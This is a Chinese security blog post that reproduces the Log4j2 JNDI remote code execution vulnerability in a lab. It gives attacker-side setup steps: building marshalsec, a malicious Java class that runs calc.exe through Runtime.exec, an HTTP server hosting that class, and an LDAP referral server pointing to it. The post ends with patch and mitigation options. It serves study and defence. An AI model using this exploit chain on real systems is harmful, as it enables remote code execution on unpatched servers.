freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Apache Log4j2远程代码执行漏洞复现
2021-12-12 22:18:58
所属地 浙江省

漏洞原理

log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。

影响版本

Log4j2.x<=2.14.1

漏洞复现

漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/1oesQz-UkpqKN3BQH9BKtw

准备环境

把受影响的jar包拖进随手建立的一个java项目,这里部署jar包步骤就不写了,网上一搜傻瓜式教程都有。
image.png

image.png

攻击机环境搭建,这里我用的vps(师兄的,因为我的是Windows。)复现环境的jdk版本最好<=8u191,基于ldap的利用方式,适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。

这里我复现环境的java版本是

02eda79925d1335ad7ce33bcf254211.png

vps下载marshalsec(我这里已经安装好):

git clone https://github.com/mbechler/marshalsec.git

image.png

然后安装maven:

apt-get install maven

然后使用maven编译marshalsec成jar包,我们先进入下载的marshalsec文件中运行:

mvn clean package -DskipTests

都成功后,编译恶意类代码robots.java

再用javac编译成robots.class文件

javac robots.java
import java.lang.Runtime;
import java.lang.Process;
public class robots{
 static {
 try {
 Runtime rt = Runtime.getRuntime();
 String[] commands = {"calc.exe"};
 Process pc = rt.exec(commands);
 pc.waitFor();
 } catch (Exception e) {
 // do nothing
 }
 }
}

image.png

搭建http服务传输恶意class文件

python -m SimpleHTTPServer 80

45e13ef22cd9954b27afb68b660169d.png

然后我们借助marshalsec项目,启动一个LDAP服务器,监听9999端口,这里的ip为vps的ip

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://x.x.x.x/#robots" 9999

image.png

成功执行
image.png

跟fastjson复现步骤差不多,可以参考我fastjson的文章:https://www.freebuf.com/articles/web/283585.html

修复方法

截止到目前,网上的修复方法大致是这些:

补丁链接:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

# log4j2
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录